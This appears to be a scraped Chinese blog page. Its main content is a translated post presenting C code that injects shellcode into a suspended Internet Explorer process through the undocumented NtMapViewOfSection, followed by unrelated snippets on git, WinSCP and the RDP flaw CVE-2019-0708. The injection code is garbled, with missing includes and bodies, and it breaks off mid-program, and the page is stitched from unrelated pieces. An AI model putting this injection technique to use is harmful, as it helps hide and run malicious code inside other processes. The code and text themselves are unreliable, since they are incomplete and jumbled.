我研究出了一種新的在遠端程序中執行**的可能性,就是利用乙個未文件函式在遠端程序位址空間寫入**,並且用一種新的技術在遠端程序中執行它,這種技術 完全工作在使用者模式下,並且不需要特殊的條件比如像管理員許可權或者之類的要求。讓原始碼說明一切:(我為我的英文水平感到抱歉,我來自德國)
copy code
#define _win32_winnt 0x0400
#include
typedef long ntstatus, *pntstatus;
#define nt_success(status) ((ntstatus)(status) >= 0)
typedef enum _section_inherit
section_inherit;
typedef ntstatus (__stdcall *func_ntmapviewofsection) ( handle, handle, lpvoid, ulong, size_t, large_integer*, size_t*, section_inherit, ulong, ulong );
func_ntmapviewofsection ntmapviewofsection = null;
// 轉換偏移量
sectionoffset.lowpart = dwfileoffsetlow;
sectionoffset.highpart = dwfileoffsethigh;
// 儲存大小和起始位址
viewbase = lpbaseaddress;
viewsize = dwnumberofbytestomap;
// 轉換標誌為nt保護屬性
if (dwdesiredaccess & file_map_write)
else if (dwdesiredaccess & file_map_read)
else if (dwdesiredaccess & file_map_copy)
else
//返回起始位址
return viewbase;
}int winapi winmain (hinstance, hinstance, lpstr, int)
{hmodule hdll = loadlibrary( "ntdll.dll" );
ntmapviewofsection = (func_ntmapviewofsection) getprocaddress (hdll, "ntmapviewofsection");
// 取shellcode,任何你想實現的
handle hfile = createfile ("c://shellcode.txt", generic_read, 0, null, open_existing, file_attribute_normal, null);
// 啟動目標程序
startupinfo st;
zeromemory (&st, sizeof(st));
st.cb = sizeof (startupinfo);
process_information pi;
zeromemory (&pi, sizeof(pi));
createprocess ("c://programme//internet explorer//iexplore.exe", null, null, null, false, create_suspended, null, null, &st, &pi);
徹底刪除遠端最新一次提交
如果在操作git時,向遠端推送了一次提交,可事後卻發現本次提交是完全錯誤的,此時的策略就是在別人提交之前徹底移除這次提交。如何操作呢?全恆 lenovo pc mingw64 d git objecttojsonpressuretest master git reset hard head 1 he...
保持遠端目錄最新對話方塊(WinSCP)
檔案使用winscp基本任務 同步 常規 保持遠端目錄最新 在對話方塊中,您可以選擇功能選項保持遠端目錄最新 要顯示該對話方塊,請轉到命令 3e保持遠端目錄最新或者單擊相應的工具欄按鈕。在兩個框中輸入同步的根目錄。預設情況下,將使用當前的工作目錄。在 裡瀏覽器介面在沒有本地工作目錄的情況下,它將是最...
最新遠端桌面漏洞(CVE 2019 0708)演示文稿
漏洞資訊 2019年5月14日微軟官方發布安全補丁,修復了windows遠端桌面服務的遠端 執行漏洞cve 2019 0708 此漏洞是預身份驗證且無需使用者互動 無需驗證系統賬戶密碼 這就意味著此漏洞能夠通過網路蠕蟲的方式被利用。利用方式是通過遠端桌面埠3389,rdp協議進行攻擊。通過rdp協議...